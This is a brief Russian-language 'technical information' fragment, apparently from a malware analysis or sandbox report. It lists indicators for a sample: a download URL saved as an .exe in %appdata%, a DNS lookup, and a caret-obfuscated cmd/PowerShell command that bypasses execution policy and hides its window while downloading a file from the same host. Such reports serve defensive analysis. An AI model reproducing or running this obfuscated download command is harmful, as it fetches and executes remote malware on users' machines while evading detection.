Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^Wer^SHElL.Ex^E -exEcuT^IOn^poLicY ^byP^aS^S -no^pRO^FiLE^ ^-W^iNDowStyL^E^ HidDeN ^(N^eW^-^OBJecT ^S^YsTE^m.nET.WEb^clIeN^t)^.DO^WnLO^Adf^Il^E^('http://www.zoerpoled.t...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "P^o^Wer^SHElL.Ex^E -exEcuT^IOn^poLicY ^byP^aS^S -no^pRO^FiLE^ ^-W^iNDowStyL^E^ HidDeN ^(N^eW^-^OBJecT ^S^YsTE^m.nET.WEb^clIeN^t)^.DO^WnLO^Adf^Il^E^('http://www.zoerpoled.t...' (со скрытым окном)